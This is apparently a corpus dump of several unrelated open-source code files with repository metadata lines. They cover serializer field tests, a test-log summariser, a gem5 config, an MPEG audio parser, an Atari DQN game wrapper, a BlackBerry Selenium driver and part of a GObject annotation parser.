({'a': 1, 'b': [4, 5, 6], 1: 123}, {'a': 1, 'b': [4, 5, 6], '1': 123}),
]
invalid_inputs = [
('not a dict', ['Expected a dictionary of items but got type "str".']),
]
outputs = [
({'a': 1, 'b': [4, 5, 6]}, {'a': 1, 'b': [4, 5, 6]}),
]
field = serializers.DictField()
class TestJSONField(FieldValues):
"""
Values for `JSONField`.
"""
valid_inputs = [
({
'a': 1,
'b': ['some', 'list', True, 1.23],
'3': None
}, {
'a': 1,
'b': ['some', 'list', True, 1.23],
'3': None
}),
]
invalid_inputs = [
({'a': set()}, ['Value must be valid JSON.']),
]
outputs = [
({
'a': 1,
'b': ['some', 'list', True, 1.23],
'3': 3
}, {
'a': 1,
'b': ['some', 'list', True, 1.23],
'3': 3
}),
]
field = serializers.JSONField()
class TestBinaryJSONField(FieldValues):
"""
Values for `JSONField` with binary=True.
"""
valid_inputs = [
(b'{"a": 1, "3": null, "b": ["some", "list", true, 1.23]}', {
'a': 1,
'b': ['some', 'list', True, 1.23],
'3': None
}),
]
invalid_inputs = [
('{"a": "unterminated string}', ['Value must be valid JSON.']),
]
outputs = [
(['some', 'list', True, 1.23], b'["some", "list", true, 1.23]'),
]
field = serializers.JSONField(binary=True)
# Tests for FieldField.
# ---------------------
class MockRequest:
def build_absolute_uri(self, value):
return 'http://example.com' + value
class TestFileFieldContext:
def test_fully_qualified_when_request_in_context(self):
field = serializers.FileField(max_length=10)
field._context = {'request': MockRequest()}
obj = MockFile(name='example.txt', url='/example.txt')
value = field.to_representation(obj)
assert value == 'http://example.com/example.txt'
# Tests for SerializerMethodField.
# --------------------------------
class TestSerializerMethodField:
def test_serializer_method_field(self):
class ExampleSerializer(serializers.Serializer):
example_field = serializers.SerializerMethodField()
def get_example_field(self, obj):
return 'ran get_example_field(%d)' % obj['example_field']
serializer = ExampleSerializer({'example_field': 123})
assert serializer.data == {
'example_field': 'ran get_example_field(123)'
}
def test_redundant_method_name(self):
class ExampleSerializer(serializers.Serializer):
example_field = serializers.SerializerMethodField('get_example_field')
with pytest.raises(AssertionError) as exc_info:
ExampleSerializer().fields
assert str(exc_info.value) == (
"It is redundant to specify `get_example_field` on "
"SerializerMethodField 'example_field' in serializer "
"'ExampleSerializer', because it is the same as the default "
"method name. Remove the `method_name` argument."
)
| bsd-2-clause | 7,313,714,012,877,029,000 | 30.397252 | 163 | 0.583818 | false |
CarlosMontilla/FxM | scripts/test/check_tests.py | 1 | 4412 | #!/usr/bin/env python3
"""!
@file
"""
import glob
import sys
import time
# @todo: manage test that have to be checked manually (such as plots)
def analyse_log(filename):
"""!
@brief Analyse a test log to find passed and failed tests
@param filename Name of the log file
@return res @todo doc this
"""
passed_str = "Passed"
failed_str = "Failed"
name_str = "Test unit: "
compiled_str = "Compiled on: "
ran_str = "\t Local "
name = ""
compiled_date = ""
run_date = ""
pass_count = 0
fail_count = 0
log_file = open(filename, 'r')
for line in log_file:
if name_str in line:
name = line[len(name_str):-1]
elif compiled_str in line:
compiled_date = line[len(compiled_str):-1]
elif ran_str in line:
run_date = line[len(ran_str):-1]
elif passed_str in line:
pass_count += 1
elif failed_str in line:
fail_count += 1
if name == "":
name = filename
res = {}
res["name"] = name
res["compiled"] = compiled_date
res["ran"] = run_date
res["pass"] = pass_count
res["fail"] = fail_count
return res
def main(folder, extension, outfile):
"""!
@brief Main function, analyse all the file in a directory with a given
extension and print the results of the passed and failed tests
@param folder Folder to analyse
@param extension File extension to analyse
@param outfile File to save a more extensive description of the tests
@return nothing
"""
fid = open(outfile, 'w+')
print("Test check run on " + time.strftime("%B %d %Y at %H:%M:%S %Z"),
file=fid)
print("", file=fid)
print("|{:^5}|{:^45}|{:^10}|{:^10}|".format("Num", "Test name", "Passed",
"Failed"), file=fid)
print("|{:^5}|{:45}+{:10}+{:10}|".format("-"*5, "-"*45, "-"*10, "-"*10), file=fid)
print("|{:^5}|{:^45}|{:^10}|{:^10}|".format("Num", "Test name", "Passed",
"Failed"))
print("|{:^5}|{:45}+{:10}+{:10}|".format("-"*5, "-"*45, "-"*10, "-"*10))
total_pass = 0
total_fail = 0
idx = 0
failed_units = []
for filename in glob.iglob(folder + "/*/**/" + "*." + extension,
recursive=True):
idx += 1
res = analyse_log(filename)
total_pass += res["pass"]
total_fail += res["fail"]
print("|{:^5}|{:<45}|{:^10}|{:^10}|".format(idx, res["name"],
res["pass"], res["fail"]), file=fid)
print("|{:^5}|{:<45}|{:^10}|{:^10}|".format(idx, res["name"],
res["pass"], res["fail"]))
print("|{:5}-{:45}+{:10}+{:10}|".format("-"*5, "-"*45, "-"*10, "-"*10), file=fid)
print("|{:5} {:<45}|{:^10}|{:^10}|".format("", "Total", total_pass,
total_fail), file=fid)
print("|{:5}-{:45}+{:10}+{:10}|".format("-"*5, "-"*45, "-"*10, "-"*10))
print("|{:5} {:<45}|{:^10}|{:^10}|".format("", "Total", total_pass,
total_fail))
print("", file=fid)
print("", file=fid)
total_pass = 0
total_fail = 0
idx = 0
for filename in glob.iglob(folder + "/*/**/" + "*." + extension,
recursive=True):
idx += 1
res = analyse_log(filename)
total_pass += res["pass"]
total_fail += res["fail"]
print("Test N " + str(idx) + ": " + res["name"], file=fid)
print("\t Logfile: " + filename, file=fid)
print("\t Compiled on: ", res["compiled"], file=fid)
print("\t Ran on: ", res["ran"], file=fid)
print("\t Passed tests: " + str(res["pass"]), file=fid)
print("\t Failed tests: " + str(res["fail"]), file=fid)
print("", file=fid)
if res["fail"] > 0:
failed_units.append((idx, res["name"]))
print("", file=fid)
if (len(failed_units) > 0):
print("FAILED UNITS:", file=fid)
for unit in failed_units:
print("\t" + str(unit[0]) + ": " + unit[1], file=fid)
else:
print("ALL TEST PASSED SUCCESSFULLY", file=fid)
fid.close()
if __name__ == "__main__":
main(sys.argv[1], sys.argv[2], sys.argv[3])
| gpl-3.0 | 4,165,981,222,870,648,000 | 27.282051 | 88 | 0.477108 | false |
Weil0ng/gem5 | tests/configs/tsunami-minor.py | 13 | 2346 | # Copyright (c) 2012 ARM Limited
# All rights reserved.
#
# The license below extends only to copyright in the software and shall
# not be construed as granting a license to any other intellectual
# property including but not limited to intellectual property relating
# to a hardware implementation of the functionality of the software
# licensed hereunder. You may use the software subject to the license
# terms below provided that you ensure that this notice is replicated
# unmodified and in its entirety in all distributions of the software,
# modified or unmodified, in source code or in binary form.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met: redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer;
# redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution;
# neither the name of the copyright holders nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# Authors: Andreas Sandberg
from m5.objects import *
from alpha_generic import *
root = LinuxAlphaFSSystemUniprocessor(mem_mode='timing',
mem_class=DDR3_1600_8x8,
cpu_class=MinorCPU).create_root()
| bsd-3-clause | 5,583,841,547,507,860,000 | 53.55814 | 72 | 0.770247 | false |
duramato/SickRage | lib/hachoir_parser/audio/mpeg_audio.py | 86 | 13752 | """
MPEG audio file parser.
Creation: 12 decembre 2005
Author: Victor Stinner
"""
from hachoir_parser import Parser
from hachoir_core.field import (FieldSet,
MissingField, ParserError, createOrphanField,
Bit, Bits, Enum,
PaddingBits, PaddingBytes,
RawBytes)
from hachoir_parser.audio.id3 import ID3v1, ID3v2
from hachoir_core.endian import BIG_ENDIAN
from hachoir_core.tools import humanFrequency, humanBitSize
from hachoir_core.bits import long2raw
from hachoir_core.error import HACHOIR_ERRORS
from hachoir_core.stream import InputStreamError
# Max MP3 filesize: 200 MB
MAX_FILESIZE = 200*1024*1024*8
class Frame(FieldSet):
VERSION_NAME = { 0: "2.5", 2: "2", 3: "1" }
MPEG_I = 3
MPEG_II = 2
MPEG_II_5 = 0
LAYER_NAME = { 1: "III", 2: "II", 3: "I" }
LAYER_I = 3
LAYER_II = 2
LAYER_III = 1
# Bit rates (bit_rate * 1000 = bits/sec)
# key 15 is always invalid
BIT_RATES = {
1: ( # MPEG1
( 0, 32, 64, 96, 128, 160, 192, 224, 256, 288, 320, 352, 384, 416, 448 ), # layer I
( 0, 32, 48, 56, 64, 80, 96, 112, 128, 160, 192, 224, 256, 320, 384 ), # layer II
( 0, 32, 40, 48, 56, 64, 80, 96, 112, 128, 160, 192, 224, 256, 320 ), # layer III
# - 1 2 3 4 5 6 7 8 9 10 11 12 13 14 -
),
2: ( # MPEG2 / MPEG2.5
( 0, 32, 48, 56, 64, 80, 96, 112, 128, 144, 160, 176, 192, 224, 256 ), # layer I
( 0, 8, 16, 24, 32, 40, 48, 56, 64, 80, 96, 112, 128, 144, 160 ), # layer II
( 0, 8, 16, 24, 32, 40, 48, 56, 64, 80, 96, 112, 128, 144, 160 ), # layer III
# - 1 2 3 4 5 6 7 8 9 10 11 12 13 14 -
)
}
SAMPLING_RATES = {
3: {0: 44100, 1: 48000, 2: 32000}, # MPEG1
2: {0: 22050, 1: 24000, 2: 16000}, # MPEG2
0: {0: 11025, 1: 12000, 2: 8000} # MPEG2.5
}
EMPHASIS_NAME = {0: "none", 1: "50/15 ms", 3: "CCIT J.17"}
CHANNEL_MODE_NAME = {
0: "Stereo",
1: "Joint stereo",
2: "Dual channel",
3: "Single channel"
}
# Channel mode => number of channels
NB_CHANNEL = {
0: 2,
1: 2,
2: 2,
3: 1,
}
def __init__(self, *args, **kw):
FieldSet.__init__(self, *args, **kw)
if not self._size:
frame_size = self.getFrameSize()
if not frame_size:
raise ParserError("MPEG audio: Invalid frame %s" % self.path)
self._size = min(frame_size * 8, self.parent.size - self.address)
def createFields(self):
# Header
yield PaddingBits(self, "sync", 11, "Synchronize bits (set to 1)", pattern=1)
yield Enum(Bits(self, "version", 2, "MPEG audio version"), self.VERSION_NAME)
yield Enum(Bits(self, "layer", 2, "MPEG audio layer"), self.LAYER_NAME)
yield Bit(self, "crc16", "No CRC16 protection?")
# Rates and padding
yield Bits(self, "bit_rate", 4, "Bit rate")
yield Bits(self, "sampling_rate", 2, "Sampling rate")
yield Bit(self, "use_padding", "Stream field use padding?")
yield Bit(self, "extension", "Extension")
# Channel mode, mode extension, copyright, ...
yield Enum(Bits(self, "channel_mode", 2, "Channel mode"), self.CHANNEL_MODE_NAME)
yield Bits(self, "mode_ext", 2, "Mode extension")
yield Bit(self, "copyright", "Is copyrighted?")
yield Bit(self, "original", "Is original?")
yield Enum(Bits(self, "emphasis", 2, "Emphasis"), self.EMPHASIS_NAME)
size = (self.size - self.current_size) / 8
if size:
yield RawBytes(self, "data", size)
def isValid(self):
return (self["layer"].value != 0
and self["sync"].value == 2047
and self["version"].value != 1
and self["sampling_rate"].value != 3
and self["bit_rate"].value not in (0, 15)
and self["emphasis"].value != 2)
def getSampleRate(self):
"""
Read sampling rate. Returns None on error.
"""
version = self["version"].value
rate = self["sampling_rate"].value
try:
return self.SAMPLING_RATES[version][rate]
except (KeyError, IndexError):
return None
def getBitRate(self):
"""
Read bit rate in bit/sec. Returns None on error.
"""
layer = 3 - self["layer"].value
bit_rate = self["bit_rate"].value
if bit_rate in (0, 15):
return None
if self["version"].value == 3:
dataset = self.BIT_RATES[1] # MPEG1
else:
dataset = self.BIT_RATES[2] # MPEG2 / MPEG2.5
try:
return dataset[layer][bit_rate] * 1000
except (KeyError, IndexError):
return None
def getFrameSize(self):
"""
Read frame size in bytes. Returns None on error.
"""
frame_size = self.getBitRate()
if not frame_size:
return None
sample_rate = self.getSampleRate()
if not sample_rate:
return None
padding = int(self["use_padding"].value)
if self["layer"].value == self.LAYER_III:
if self["version"].value == self.MPEG_I:
return (frame_size * 144) // sample_rate + padding
else:
return (frame_size * 72) // sample_rate + padding
elif self["layer"].value == self.LAYER_II:
return (frame_size * 144) / sample_rate + padding
else: # self.LAYER_I:
frame_size = (frame_size * 12) / sample_rate
return (frame_size + padding) * 4
def getNbChannel(self):
return self.NB_CHANNEL[ self["channel_mode"].value ]
def createDescription(self):
info = ["layer %s" % self["layer"].display]
bit_rate = self.getBitRate()
if bit_rate:
info.append("%s/sec" % humanBitSize(bit_rate))
sampling_rate = self.getSampleRate()
if sampling_rate:
info.append(humanFrequency(sampling_rate))
return "MPEG-%s %s" % (self["version"].display, ", ".join(info))
def findSynchronizeBits(parser, start, max_size):
"""
Find synchronisation bits (11 bits set to 1)
Returns None on error, or number of bytes before the synchronization.
"""
address0 = parser.absolute_address
end = start + max_size
size = 0
while start < end:
# Fast search: search 0xFF (first byte of sync frame field)
length = parser.stream.searchBytesLength("\xff", False, start, end)
if length is None:
return None
size += length
start += length * 8
# Strong validation of frame: create the frame
# and call method isValid()
try:
frame = createOrphanField(parser, start-address0, Frame, "frame")
valid = frame.isValid()
except HACHOIR_ERRORS:
valid = False
if valid:
return size
# Invalid frame: continue
start += 8
size += 1
return None
class Frames(FieldSet):
# Padding bytes allowed before a frame
MAX_PADDING = 256
def synchronize(self):
addr = self.absolute_address
start = addr + self.current_size
end = min(start + self.MAX_PADDING*8, addr + self.size)
padding = findSynchronizeBits(self, start, end)
if padding is None:
raise ParserError("MPEG audio: Unable to find synchronization bits")
if padding:
return PaddingBytes(self, "padding[]", padding, "Padding before synchronization")
else:
return None
def looksConstantBitRate(self, count=10):
"""
Guess if frames are constant bit rate. If it returns False, you can
be sure that frames are variable bit rate. Otherwise, it looks like
constant bit rate (on first count fields).
"""
check_keys = ("version", "layer", "bit_rate")
last_field = None
for index, field in enumerate(self.array("frame")):
if last_field:
for key in check_keys:
if field[key].value != last_field[key].value:
return False
last_field = field
if index == count:
break
return True
def createFields(self):
# Find synchronisation bytes
padding = self.synchronize()
if padding:
yield padding
while self.current_size < self.size:
yield Frame(self, "frame[]")
# padding = self.synchronize()
# if padding:
# yield padding
# Read raw bytes at the end (if any)
size = (self.size - self.current_size) / 8
if size:
yield RawBytes(self, "raw", size)
def createDescription(self):
if self.looksConstantBitRate():
text = "(looks like) Constant bit rate (CBR)"
else:
text = "Variable bit rate (VBR)"
return "Frames: %s" % text
def createMpegAudioMagic():
# ID3v1 magic
magics = [("TAG", 0)]
# ID3v2 magics
for ver_major in ID3v2.VALID_MAJOR_VERSIONS:
magic = "ID3%c\x00" % ver_major
magics.append( (magic,0) )
# MPEG frame magic
# TODO: Use longer magic: 32 bits instead of 16 bits
SYNC_BITS = 2047
for version in Frame.VERSION_NAME.iterkeys():
for layer in Frame.LAYER_NAME.iterkeys():
for crc16 in (0, 1):
magic = (SYNC_BITS << 5) | (version << 3) | (layer << 1) | crc16
magic = long2raw(magic, BIG_ENDIAN, 2)
magics.append( (magic, 0) )
return magics
class MpegAudioFile(Parser):
PARSER_TAGS = {
"id": "mpeg_audio",
"category": "audio",
"file_ext": ("mpa", "mp1", "mp2", "mp3"),
"mime": (u"audio/mpeg",),
"min_size": 4*8,
# "magic": createMpegAudioMagic(),
"description": "MPEG audio version 1, 2, 2.5",
"subfile": "skip",
}
endian = BIG_ENDIAN
def validate(self):
if self[0].name in ("id3v2", "id3v1"):
return True
if not self.stream.checked: # TODO: is it possible to handle piped input?
return False
# Validate first 5 frames
for index in xrange(5):
try:
frame = self["frames/frame[%u]" % index]
except MissingField:
# Require a least one valid frame
if (1 <= index) \
and self["frames"].done:
return True
return "Unable to get frame #%u" % index
except (InputStreamError, ParserError):
return "Unable to create frame #%u" % index
# Check first frame values
if not frame.isValid():
return "Frame #%u is invalid" % index
# Check that all frames are similar
if not index:
frame0 = frame
else:
if frame0["channel_mode"].value != frame["channel_mode"].value:
return "Frame #%u channel mode is different" % index
return True
def createFields(self):
# Read ID3v2 (if any)
if self.stream.readBytes(0, 3) == "ID3":
yield ID3v2(self, "id3v2")
if self._size is None: # TODO: is it possible to handle piped input?
raise NotImplementedError
# Check if file is ending with ID3v1 or not and compute frames size
frames_size = self.size - self.current_size
addr = self.size - 128*8
if 0 <= addr:
has_id3 = (self.stream.readBytes(addr, 3) == "TAG")
if has_id3:
frames_size -= 128*8
else:
has_id3 = False
# Read frames (if any)
if frames_size:
yield Frames(self, "frames", size=frames_size)
# Read ID3v1 (if any)
if has_id3:
yield ID3v1(self, "id3v1")
def createDescription(self):
if "frames" in self:
frame = self["frames/frame[0]"]
return "%s, %s" % (frame.description, frame["channel_mode"].display)
elif "id3v2" in self:
return self["id3v2"].description
elif "id3v1" in self:
return self["id3v1"].description
else:
return "MPEG audio"
def createContentSize(self):
# Get "frames" field
field = self[0]
if field.name != "frames":
try:
field = self[1]
except MissingField:
# File only contains ID3v1 or ID3v2
return field.size
# Error: second field are not the frames"?
if field.name != "frames":
return None
# Go to last frame
frames = field
frame = frames["frame[0]"]
address0 = field.absolute_address
size = address0 + frame.size
while True:
try:
# Parse one MPEG audio frame
frame = createOrphanField(frames, size - address0, Frame, "frame")
# Check frame 32 bits header
if not frame.isValid():
break
except HACHOIR_ERRORS:
break
if MAX_FILESIZE < (size + frame.size):
break
size += frame.size
# ID3v1 at the end?
try:
if self.stream.readBytes(size, 3) == "TAG":
size += ID3v1.static_size
except InputStreamError:
pass
return size
| gpl-3.0 | -7,043,573,774,525,663,000 | 32.705882 | 99 | 0.534177 | false |
xcgoner/dist-mxnet | example/reinforcement-learning/dqn/atari_game.py | 25 | 7148 | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
__author__ = 'sxjscience'
import mxnet as mx
import numpy
import cv2
import logging
import os
from utils import *
from replay_memory import ReplayMemory
from game import Game
from game import DEFAULT_MAX_EPISODE_STEP
logger = logging.getLogger(__name__)
_dirname = os.path.dirname(os.path.realpath(__file__))
_default_rom_path = os.path.join(_dirname, "roms", "breakout.bin")
def ale_load_from_rom(rom_path, display_screen):
rng = get_numpy_rng()
try:
from ale_python_interface import ALEInterface
except ImportError as e:
raise ImportError('Unable to import the python package of Arcade Learning Environment. ' \
'ALE may not have been installed correctly. Refer to ' \
'`https://github.com/mgbellemare/Arcade-Learning-Environment` for some' \
'installation guidance')
ale = ALEInterface()
ale.setInt('random_seed', rng.randint(1000))
if display_screen:
import sys
if sys.platform == 'darwin':
import pygame
pygame.init()
ale.setBool('sound', False) # Sound doesn't work on OSX
ale.setBool('display_screen', True)
else:
ale.setBool('display_screen', False)
ale.setFloat('repeat_action_probability', 0)
ale.loadROM(rom_path)
return ale
class AtariGame(Game):
def __init__(self,
rom_path=_default_rom_path,
frame_skip=4, history_length=4,
resize_mode='scale', resized_rows=84, resized_cols=84, crop_offset=8,
display_screen=False, max_null_op=30,
replay_memory_size=1000000,
replay_start_size=100,
death_end_episode=True):
super(AtariGame, self).__init__()
self.rng = get_numpy_rng()
self.ale = ale_load_from_rom(rom_path=rom_path, display_screen=display_screen)
self.start_lives = self.ale.lives()
self.action_set = self.ale.getMinimalActionSet()
self.resize_mode = resize_mode
self.resized_rows = resized_rows
self.resized_cols = resized_cols
self.crop_offset = crop_offset
self.frame_skip = frame_skip
self.history_length = history_length
self.max_null_op = max_null_op
self.death_end_episode = death_end_episode
self.screen_buffer_length = 2
self.screen_buffer = numpy.empty((self.screen_buffer_length,
self.ale.getScreenDims()[1], self.ale.getScreenDims()[0]),
dtype='uint8')
self.replay_memory = ReplayMemory(state_dim=(resized_rows, resized_cols),
history_length=history_length,
memory_size=replay_memory_size,
replay_start_size=replay_start_size)
self.start()
def start(self):
self.ale.reset_game()
null_op_num = self.rng.randint(self.screen_buffer_length,
max(self.max_null_op + 1, self.screen_buffer_length + 1))
for i in range(null_op_num):
self.ale.act(0)
self.ale.getScreenGrayscale(self.screen_buffer[i % self.screen_buffer_length, :, :])
self.total_reward = 0
self.episode_reward = 0
self.episode_step = 0
self.max_episode_step = DEFAULT_MAX_EPISODE_STEP
self.start_lives = self.ale.lives()
def force_restart(self):
self.start()
self.replay_memory.clear()
def begin_episode(self, max_episode_step=DEFAULT_MAX_EPISODE_STEP):
"""
Begin an episode of a game instance. We can play the game for a maximum of
`max_episode_step` and after that, we are forced to restart
"""
if self.episode_step > self.max_episode_step or self.ale.game_over():
self.start()
else:
for i in range(self.screen_buffer_length):
self.ale.act(0)
self.ale.getScreenGrayscale(self.screen_buffer[i % self.screen_buffer_length, :, :])
self.max_episode_step = max_episode_step
self.start_lives = self.ale.lives()
self.episode_reward = 0
self.episode_step = 0
@property
def episode_terminate(self):
termination_flag = self.ale.game_over() or self.episode_step >= self.max_episode_step
if self.death_end_episode:
return (self.ale.lives() < self.start_lives) or termination_flag
else:
return termination_flag
@property
def state_enabled(self):
return self.replay_memory.size >= self.replay_memory.history_length
def get_observation(self):
image = self.screen_buffer.max(axis=0)
if 'crop' == self.resize_mode:
original_rows, original_cols = image.shape
new_resized_rows = int(round(
float(original_rows) * self.resized_cols / original_cols))
resized = cv2.resize(image, (self.resized_cols, new_resized_rows),
interpolation=cv2.INTER_LINEAR)
crop_y_cutoff = new_resized_rows - self.crop_offset - self.resized_rows
img = resized[crop_y_cutoff:
crop_y_cutoff + self.resized_rows, :]
return img
else:
return cv2.resize(image, (self.resized_cols, self.resized_rows),
interpolation=cv2.INTER_LINEAR)
def play(self, a):
assert not self.episode_terminate,\
"Warning, the episode seems to have terminated. " \
"We need to call either game.begin_episode(max_episode_step) to continue a new " \
"episode or game.start() to force restart."
self.episode_step += 1
reward = 0.0
action = self.action_set[a]
for i in range(self.frame_skip):
reward += self.ale.act(action)
self.ale.getScreenGrayscale(self.screen_buffer[i % self.screen_buffer_length, :, :])
self.total_reward += reward
self.episode_reward += reward
ob = self.get_observation()
terminate_flag = self.episode_terminate
self.replay_memory.append(ob, a, numpy.clip(reward, -1, 1), terminate_flag)
return reward, terminate_flag
| apache-2.0 | 3,069,754,307,413,965,000 | 40.55814 | 100 | 0.607303 | false |
LukeMurphey/splunk-network-tools | tests/selenium/webdriver/blackberry/webdriver.py | 44 | 4870 | # Licensed to the Software Freedom Conservancy (SFC) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The SFC licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import os
import platform
import subprocess
try:
import http.client as http_client
except ImportError:
import httplib as http_client
from selenium.webdriver.remote.webdriver import WebDriver as RemoteWebDriver
from selenium.common.exceptions import WebDriverException
from selenium.webdriver.support.ui import WebDriverWait
LOAD_TIMEOUT = 5
class WebDriver(RemoteWebDriver):
"""
Controls the BlackBerry Browser and allows you to drive it.
:Args:
- device_password - password for the BlackBerry device or emulator you are
trying to drive
- bb_tools_dir path to the blackberry-deploy executable. If the default
is used it assumes it is in the $PATH
- hostip - the ip for the device you are trying to drive. Falls back to
169.254.0.1 which is the default ip used
- port - the port being used for WebDriver on device. defaults to 1338
- desired_capabilities: Dictionary object with non-browser specific
capabilities only, such as "proxy" or "loggingPref".
Note: To get blackberry-deploy you will need to install the BlackBerry
WebWorks SDK - the default install will put it in the $PATH for you.
Download at https://developer.blackberry.com/html5/downloads/
"""
def __init__(self, device_password, bb_tools_dir=None,
hostip='169.254.0.1', port=1338, desired_capabilities={}):
remote_addr = 'http://{}:{}'.format(hostip, port)
filename = 'blackberry-deploy'
if platform.system() == "Windows":
filename += '.bat'
if bb_tools_dir is not None:
if os.path.isdir(bb_tools_dir):
bb_deploy_location = os.path.join(bb_tools_dir, filename)
if not os.path.isfile(bb_deploy_location):
raise WebDriverException('Invalid blackberry-deploy location: {}'.format(bb_deploy_location))
else:
raise WebDriverException('Invalid blackberry tools location, must be a directory: {}'.format(bb_tools_dir))
else:
bb_deploy_location = filename
"""
Now launch the BlackBerry browser before allowing anything else to run.
"""
try:
launch_args = [bb_deploy_location,
'-launchApp',
str(hostip),
'-package-name', 'sys.browser',
'-package-id', 'gYABgJYFHAzbeFMPCCpYWBtHAm0',
'-password', str(device_password)]
with open(os.devnull, 'w') as fp:
p = subprocess.Popen(launch_args, stdout=fp)
returncode = p.wait()
if returncode == 0:
# wait for the BlackBerry10 browser to load.
is_running_args = [bb_deploy_location,
'-isAppRunning',
str(hostip),
'-package-name', 'sys.browser',
'-package-id', 'gYABgJYFHAzbeFMPCCpYWBtHAm0',
'-password', str(device_password)]
WebDriverWait(None, LOAD_TIMEOUT)\
.until(lambda x: subprocess.check_output(is_running_args)
.find('result::true'),
message='waiting for BlackBerry10 browser to load')
RemoteWebDriver.__init__(self,
command_executor=remote_addr,
desired_capabilities=desired_capabilities)
else:
raise WebDriverException('blackberry-deploy failed to launch browser')
except Exception as e:
raise WebDriverException('Something went wrong launching blackberry-deploy', stacktrace=getattr(e, 'stacktrace', None))
def quit(self):
"""
Closes the browser and shuts down the
"""
try:
RemoteWebDriver.quit(self)
except http_client.BadStatusLine:
pass
| apache-2.0 | 5,285,876,427,348,523,000 | 40.982759 | 131 | 0.606982 | false |
hotdoc/hotdoc | hotdoc/extensions/gi/annotation_parser.py | 1 | 7809 | # -*- coding: utf-8 -*-
#
# Copyright © 2015,2016 Mathieu Duponchelle <[email protected]>
# Copyright © 2015,2016 Collabora Ltd
#
# This library is free software; you can redistribute it and/or modify it under
# the terms of the GNU Lesser General Public License as published by the Free
# Software Foundation; either version 2.1 of the License, or (at your option)
# any later version.
#
# This library is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. See the GNU Lesser General Public License for more
# details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with this library. If not, see <http://www.gnu.org/licenses/>.
ALLOW_NONE_HELP = \
"NULL is OK, both for passing and returning"
TRANSFER_NONE_HELP = \
"Don't free data after the code is done"
TRANSFER_FULL_HELP = \
"Free data after the code is done"
TRANSFER_FLOATING_HELP = \
"Alias for transfer none, used for objects with floating refs"
TRANSFER_CONTAINER_HELP = \
"Free data container after the code is done"
CLOSURE_HELP = \
"This parameter is a closure for callbacks, many bindings can pass NULL to %s"
CLOSURE_DATA_HELP = \
"This parameter is a closure for callbacks, many bindings can pass NULL here"
DIRECTION_OUT_HELP = \
"Parameter for returning results"
DIRECTION_INOUT_HELP = \
"Parameter for input and for returning results"
DIRECTION_IN_HELP = \
"Parameter for input. Default is transfer none"
ARRAY_HELP = \
"Parameter points to an array of items"
ELEMENT_TYPE_HELP = \
"Generic and defining element of containers and arrays"
SCOPE_ASYNC_HELP = \
"The callback is valid until first called"
SCOPE_CALL_HELP = \
"The callback is valid only during the call to the method"
SCOPE_NOTIFIED_HELP=\
"The callback is valid until the GDestroyNotify argument is called"
NULLABLE_HELP = \
"NULL may be passed to the value"
NOT_NULLABLE_HELP = \
"NULL is *not* OK, either for passing or returning"
DEFAULT_HELP = \
"Default parameter value (for in case the shadows-to function has less parameters)"
DESTROY_HELP = \
"The parameter is a 'destroy_data' for callbacks."
# VERY DIFFERENT FROM THE PREVIOUS ONE BEWARE :P
OPTIONAL_HELP = \
"NULL may be passed instead of a pointer to a location"
# WTF
TYPE_HELP = \
"Override the parsed C type with given type"
class GIAnnotation (object):
def __init__(self, nick, help_text, value=None):
self.nick = nick
self.help_text = help_text
self.value = value
class GIAnnotationParser(object):
def __init__(self):
self.__annotation_factories = \
{"allow-none": self.__make_allow_none_annotation,
"transfer": self.__make_transfer_annotation,
"inout": self.__make_inout_annotation,
"out": self.__make_out_annotation,
"in": self.__make_in_annotation,
"array": self.__make_array_annotation,
"element-type": self.__make_element_type_annotation,
"scope": self.__make_scope_annotation,
"closure": self.__make_closure_annotation,
"nullable": self.__make_nullable_annotation,
"type": self.__make_type_annotation,
"optional": self.__make_optional_annotation,
"default": self.__make_default_annotation,
"destroy": self.__make_destroy_annotation,
}
def __make_type_annotation (self, annotation, value):
if not value:
return None
return GIAnnotation("type", TYPE_HELP, value[0])
def __make_nullable_annotation (self, annotation, value):
return GIAnnotation("nullable", NULLABLE_HELP)
def __make_optional_annotation (self, annotation, value):
return GIAnnotation ("optional", OPTIONAL_HELP)
def __make_allow_none_annotation(self, annotation, value):
